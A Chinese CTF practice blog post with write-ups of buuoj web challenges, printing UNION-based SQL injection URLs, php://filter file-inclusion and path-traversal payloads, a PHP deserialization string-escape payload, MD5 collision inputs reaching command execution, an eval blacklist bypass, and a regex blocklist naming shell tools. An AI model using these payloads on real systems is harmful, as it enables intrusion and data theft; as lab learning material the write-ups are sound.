buuoj刷题 October

2019 极客大挑战

web

easysql

直接万能密码登就完事了

LoveSQL

万能密码登进去，给了md5，没解出来

手注吧，都要忘了手注怎么注了

猜字段数

3的时候正常不报错

看回显位，2，3回显

数据库名geek mariadb

表名http://42ad587e-35ed-4886-8604-152737808539.node3.buuoj.cn/check.php?username=1' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 1,2%23&password=1

有两张表，geekuser，l0ve1ysq1

查字段http://42ad587e-35ed-4886-8604-152737808539.node3.buuoj.cn/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' %23&password=1

查数据http://42ad587e-35ed-4886-8604-152737808539.node3.buuoj.cn/check.php?username=1' union select 1,2,group_concat(concat_ws(0x7e,username,password)) from geek.l0ve1ysq1 %23&password=1

Havefun

看注释

        $cat=$_GET['cat'];

        echo $cat;

        if($cat=='dog'){

            echo 'Syc{cat_cat_cat_cat}';

        }

Secret File

根据题目找到secr3t.php

 <html>

    <title>secret</title>

    <meta charset="UTF-8">

<?php

    highlight_file(__FILE__);

    error_reporting(0);

    $file=$_GET['file'];

    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){

        echo "Oh no!";

        exit();

    }

    include($file);

//flag放在了flag.php里

?>

</html>

用伪协议

file=php://filter/convert.base64-encode/resource=flag.php

<!DOCTYPE html>

<html>

    <head>

        <meta charset="utf-8">

        <title>FLAG</title>

    </head>

    <body style="background-color:black;"><br><br><br><br><br><br>

        <h1 style="font-family:verdana;color:red;text-align:center;">ååï¼ä½ æ¾å°æäºï¼å¯æ¯ä½ çä¸å°æQAQ~~~</h1><br><br><br>

        <p style="font-family:arial;color:red;font-size:20px;text-align:center;">

            <?php

                echo "æå°±å¨è¿é";

                $flag = 'flag{86bb23e6-80c2-4f0b-bc2e-b73eb4781fb0}';

                $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'

            ?>

        </p>

    </body>

</html>

极客大挑战题大都萌新，不做了

2019 安洵杯

easy_serialize_php

直接看源码

 <?php

$function = @$_GET['f'];

function filter($img){

    $filter_arr = array('php','flag','php5','php4','fl1g');

    $filter = '/'.implode('|',$filter_arr).'/i';

    return preg_replace($filter,'',$img);

}

if($_SESSION){

    unset($_SESSION);

}

$_SESSION["user"] = 'guest';

$_SESSION['function'] = $function;

extract($_POST);

if(!$function){

    echo '<a href="index.php?f=highlight_file">source_code</a>';

}

if(!$_GET['img_path']){

    $_SESSION['img'] = base64_encode('guest_img.png');

}else{

    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));

}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){

    highlight_file('index.php');

}else if($function == 'phpinfo'){

    eval('phpinfo();'); //maybe you can find something in here!

}else if($function == 'show_image'){

    $userinfo = unserialize($serialize_info);

    echo file_get_contents(base64_decode($userinfo['img']));

}

先看下phpinfo

php.ini中设置了auto_prepend_file隐式包含了d0g3_f1ag.php，直接访问可以发现没有任何内容，说明我们需要读取这个文件的内容。

auto_prepend_file 相当于在页面顶部require

往下看有个file_get_contents，从这个函数逆推回去$userinfo["img"]的值，可以发现这个值是我们可控的，传入img_path会经过base64编码sha1加密，而我没有解密，导致无法读取任何文件。

此时需要把注意力转移到另外一个函数serialize上，这里有一个很明显的漏洞点，数据经过序列化了之后又经过了一层过滤函数，而这层过滤函数会干扰序列化后的数据。

这里需要知道一些trick

php反序列化字符串逃逸

php中，反序列化的过程中必须严格按照序列化规则才能成功实现反序列化，比如

<?php

$str='a:2:{i:0;s:8:"twosmi1e";i:1;s:5:"aaaaa";}';

var_dump(unserialize($str));

?>

一般我们会认为，只要增加或去除str的任何一个字符都会导致反序列化的失败。但是事实并非如此，php在反序列化字符串尾部增加字符可以逃逸

php反序列化长度变化尾部字符串逃逸

<?php

$str='a:2:{i:0;s:8:"twosmi1e";i:1;s:5:"aaaaa";}i:2;s:4:"2333"';

var_dump(unserialize($str));

?>

仍然输出

<?php

$_SESSION["user"]='flagflagflagflagflagflag'；

$_SESSION["function"]='a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}';

$_SESSION["img"]='L2QwZzNfZmxsbGxsbGFn';

echo serialize($_SESSION);

我们进行序列化，结果为

a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

题目中过滤了'php','flag','php5','php4','fl1g' 替换为空

<?php

function filter($img){

    $filter_arr = array('php','flag','php5','php4','fl1g');

    $filter = '/'.implode('|',$filter_arr).'/i';

    return preg_replace($filter,'',$img);

}

$_SESSION["user"]='flagflagflagflagflagflag';

$_SESSION["function"]='a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}';

$_SESSION["img"]='L2QwZzNfZmxsbGxsbGFn';

$r = filter(serialize($_SESSION));

print_r($r);

print_r(unserialize($r));

a:3:{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

将这串字符串进行序列化会得到什么？

这个时候关注第二个s所对应的数字，本来由于有6个flag字符所以为24，现在这6个flag都被过滤了，那么它将会尝试向后读取24个字符看看是否满足序列化的规则，也即读取;s:8:"function";s:59:"a,读取这24个字符后以”;结尾，恰好满足规则，而后第三个s向后读取img的20个字符，第四个、第五个s向后读取均满足规则，所以序列化结果为

我们能够控制原来SESSION数组的funcion的值但无法控制img的值，我们就可以通过这种方式间接控制到img对应的值。他本来想读取的base64编码是：L2QwZzNfZmxsbGxsbGFn,但是由于过滤掉了flag,向后读取的过程中把键值function放到了第一个键值的内容里面，用ZDBnM19mMWFnLnBocA==代替了真正的base64编码，读取了d0g3_f1ag.php的内容。而识别完成后最后面的";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}被忽略掉了，不影响正常的反序列化过程。

可以看到，因为过滤函数的存在，我们利用php反序列化尾部逃逸这个trick，将img的值完成了替换。

解题

我们构造_SESSION[flagflag]=";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

过滤过后会变成这样

a:1:{s:8:"flagflag";s:51:"";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";}

a:1:{s:8:"";s:51:"";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";}

就间接控制了file_get_contents

页面回显

再把base64替换一下_SESSION[fl1gfl1g]=";s:3:"aaa";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

flag{570a6511-eb9f-446c-80eb-a4967a836549}

另一种payload

get:f=show_image

post:_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}

然后同样替换base64拿到flag

easyweb

看这个url

http://1a911357-535b-4b7b-9cfb-70b4de737acc.node3.buuoj.cn/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=

img两次base64解码得到3535352e706e67，十六进制解码得到555.png 文件包含

读一下index.php http://1a911357-535b-4b7b-9cfb-70b4de737acc.node3.buuoj.cn/index.php?img=TmprMlpUWTBOalUzT0RKbE56QTJPRGN3&cmd=

<img src='data:image/gif;base64,PD9waHAKZXJyb3JfcmVwb3J0aW5nKEVfQUxMIHx8IH4gRV9OT1RJQ0UpOwpoZWFkZXIoJ2NvbnRlbnQtdHlwZTp0ZXh0L2h0bWw7Y2hhcnNldD11dGYtOCcpOwokY21kID0gJF9HRVRbJ2NtZCddOwppZiAoIWlzc2V0KCRfR0VUWydpbWcnXSkgfHwgIWlzc2V0KCRfR0VUWydjbWQnXSkpIAogICAgaGVhZGVyKCdSZWZyZXNoOjA7dXJsPS4vaW5kZXgucGhwP2ltZz1UWHBWZWs1VVRURk5iVlV6VFVSYWJFNXFZejAmY21kPScpOwokZmlsZSA9IGhleDJiaW4oYmFzZTY0X2RlY29kZShiYXNlNjRfZGVjb2RlKCRfR0VUWydpbWcnXSkpKTsKCiRmaWxlID0gcHJlZ19yZXBsYWNlKCIvW15hLXpBLVowLTkuXSsvIiwgIiIsICRmaWxlKTsKaWYgKHByZWdfbWF0Y2goIi9mbGFnL2kiLCAkZmlsZSkpIHsKICAgIGVjaG8gJzxpbWcgc3JjID0iLi9jdGYzLmpwZWciPic7CiAgICBkaWUoInhpeGnvvZ4gbm8gZmxhZyIpOwp9IGVsc2UgewogICAgJHR4dCA9IGJhc2U2NF9lbmNvZGUoZmlsZV9nZXRfY29udGVudHMoJGZpbGUpKTsKICAgIGVjaG8gIjxpbWcgc3JjPSdkYXRhOmltYWdlL2dpZjtiYXNlNjQsIiAuICR0eHQgLiAiJz48L2ltZz4iOwogICAgZWNobyAiPGJyPiI7Cn0KZWNobyAkY21kOwplY2hvICI8YnI+IjsKaWYgKHByZWdfbWF0Y2goIi9sc3xiYXNofHRhY3xubHxtb3JlfGxlc3N8aGVhZHx3Z2V0fHRhaWx8dml8Y2F0fG9kfGdyZXB8c2VkfGJ6bW9yZXxiemxlc3N8cGNyZXxwYXN0ZXxkaWZmfGZpbGV8ZWNob3xzaHxcJ3xcInxcYHw7fCx8XCp8XD98XFx8XFxcXHxcbnxcdHxccnxceEEwfFx7fFx9fFwofFwpfFwmW15cZF18QHxcfHxcXCR8XFt8XF18e3x9fFwofFwpfC18PHw+L2kiLCAkY21kKSkgewogICAgZWNobygiZm9yYmlkIH4iKTsKICAgIGVjaG8gIjxicj4iOwp9IGVsc2UgewogICAgaWYgKChzdHJpbmcpJF9QT1NUWydhJ10gIT09IChzdHJpbmcpJF9QT1NUWydiJ10gJiYgbWQ1KCRfUE9TVFsnYSddKSA9PT0gbWQ1KCRfUE9TVFsnYiddKSkgewogICAgICAgIGVjaG8gYCRjbWRgOwogICAgfSBlbHNlIHsKICAgICAgICBlY2hvICgibWQ1IGlzIGZ1bm55IH4iKTsKICAgIH0KfQoKPz4KPGh0bWw+CjxzdHlsZT4KICBib2R5ewogICBiYWNrZ3JvdW5kOnVybCguL2JqLnBuZykgIG5vLXJlcGVhdCBjZW50ZXIgY2VudGVyOwogICBiYWNrZ3JvdW5kLXNpemU6Y292ZXI7CiAgIGJhY2tncm91bmQtYXR0YWNobWVudDpmaXhlZDsKICAgYmFja2dyb3VuZC1jb2xvcjojQ0NDQ0NDOwp9Cjwvc3R5bGU+Cjxib2R5Pgo8L2JvZHk+CjwvaHRtbD4='></img><br><br>md5 is funny ~<html>

解码得到

<?php

error_reporting(E_ALL || ~ E_NOTICE);

header('content-type:text/html;charset=utf-8');

$cmd = $_GET['cmd'];

if (!isset($_GET['img']) || !isset($_GET['cmd']))

    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');

$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);

if (preg_match("/flag/i", $file)) {

    echo '<img src ="./ctf3.jpeg">';

    die("xixiï½ no flag");

} else {

    $txt = base64_encode(file_get_contents($file));

    echo "<img src='data:image/gif;base64," . $txt . "'></img>";

    echo "<br>";

}

echo $cmd;

echo "<br>";

if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {

    echo("forbid ~");

    echo "<br>";

} else {

    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {

        echo `$cmd`;

    } else {

        echo ("md5 is funny ~");

    }

}

?>

<html>

<style>

  body{

   background:url(./bj.png)  no-repeat center center;

   background-size:cover;

   background-attachment:fixed;

   background-color:#CCCCCC;

}

</style>

<body>

</body>

</html>

可以看到后面有个md5强碰撞的考点

if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b']))

这里是=== POST

a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2

&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

param1=%D11%DD%02%C5%E6%EE%C4i%3D%9A%06%98%AF%F9%5C%2F%CA%B5%87%12F%7E%AB%40%04X%3E%B8%FB%7F%89U%AD4%06%09%F4%B3%02%83%E4%88%83%25qAZ%08Q%25%E8%F7%CD%C9%9F%D9%1D%BD%F2%807%3C%5B%D8%82%3E1V4%8F%5B%AEm%AC%D46%C9%19%C6%DDS%E2%B4%87%DA%03%FD%029c%06%D2H%CD%A0%E9%9F3B%0FW%7E%E8%CET%B6p%80%A8%0D%1E%C6%98%21%BC%B6%A8%83%93%96%F9e%2Bo%F7%2Ap

param2=%D11%DD%02%C5%E6%EE%C4i%3D%9A%06%98%AF%F9%5C%2F%CA%B5%07%12F%7E%AB%40%04X%3E%B8%FB%7F%89U%AD4%06%09%F4%B3%02%83%E4%88%83%25%F1AZ%08Q%25%E8%F7%CD%C9%9F%D9%1D%BDr%807%3C%5B%D8%82%3E1V4%8F%5B%AEm%AC%D46%C9%19%C6%DDS%E24%87%DA%03%FD%029c%06%D2H%CD%A0%E9%9F3B%0FW%7E%E8%CET%B6p%80%28%0D%1E%C6%98%21%BC%B6%A8%83%93%96%F9e%ABo%F7%2Ap

flag在根目录

读取flag

也可以用cat

2018 HCTF

warmup(Web)

 <?php

    highlight_file(__FILE__);

    class emmm

    {

        public static function checkFile(&$page)

        {

            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];

            if (! isset($page) || !is_string($page)) {

                echo "you can't see it";

                return false;

            }

            if (in_array($page, $whitelist)) {

                return true;

            }

            $_page = mb_substr(

                $page,

                0,

                mb_strpos($page . '?', '?')

            );

            if (in_array($_page, $whitelist)) {

                return true;

            }

            $_page = urldecode($page);

            $_page = mb_substr(

                $_page,

                0,

                mb_strpos($_page . '?', '?')

            );

            if (in_array($_page, $whitelist)) {

                return true;

            }

            echo "you can't see it";

            return false;

        }

    }

    if (! empty($_REQUEST['file'])

        && is_string($_REQUEST['file'])

        && emmm::checkFile($_REQUEST['file'])

    ) {

        include $_REQUEST['file'];

        exit;

    } else {

        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";

    }

?>

mb_strpos: 查找字符串在另一个字符串中首次出现的位置

mb_substr：数返回字符串的一部分，分割的中文文字则需要使用 mb_substr()

mb_strpos 按字处理，strpos 按字符处理

php > echo mb_substr("那是真滴牛皮", 2, 4);

真滴牛皮

php > echo strpos("那是真滴牛皮", "真滴");

6

php > echo mb_strpos("那是真滴牛皮", "真滴");

2

utf-8编码中汉字占三个字符

读一下源码，checkFile截取问号之前的url做白名单检查，然后文件包含

$_page = mb_substr(

                $page,

                0,

                mb_strpos($page . '?', '?')

linux下php会把hint.php?/当成目录然后../返回就能读取了

http://www.bmzclub.cn:20102/?file=hint.php?/../../../../../../../../flaaagg

2019 RCTF

Easy Calc

看代码，有waf

<script>

    $('#calc').submit(function(){

        $.ajax({

            url:"calc.php?num="+encodeURIComponent($("#content").val()),

            type:'GET',

            success:function(data){

                $("#result").html(`<div class="alert alert-success">

            <strong>答案:</strong>${data}

            </div>`);

            },

            error:function(){

                alert("这啥?算不来!");

            }

        })

        return false;

    })

</script>

 <?php

error_reporting(0);

if(!isset($_GET['num'])){

    show_source(__FILE__);

}else{

        $str = $_GET['num'];

        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];

        foreach ($blacklist as $blackitem) {

                if (preg_match('/' . $blackitem . '/m', $str)) {

                        die("what are you want to do?");

                }

        }

        eval('echo '.$str.';');

}

?>

绕过waf黑名单通过eval执行命令

试了下只能传数字和符号，传字母会403

利用PHP的字符串解析特性Bypass

https://www.freebuf.com/articles/web/213359.html

在num参数前面加一个空格，这样就能过waf，并且在解析的过程中会删除该空格，成功传入参数

使用chr(47)绕过对\的限制

flag{b3e7e8dd-47d0-45e6-93ed-93c51457a4f2}

利用HTTP请求走私

https://xz.aliyun.com/t/6878

ACTF2020 新生赛

Include

有文件包含

无语，读源码就有flag

http://96328baf-1efb-4337-99e2-b4b693506a9b.node3.buuoj.cn/?file=php:%2F%2Ffilter%2Fread=convert.base64-encode%2Fresource=flag.php

<?php

echo "Can you find out the flag?";

//flag{63dce90f-03cd-4054-b612-b8285450228a}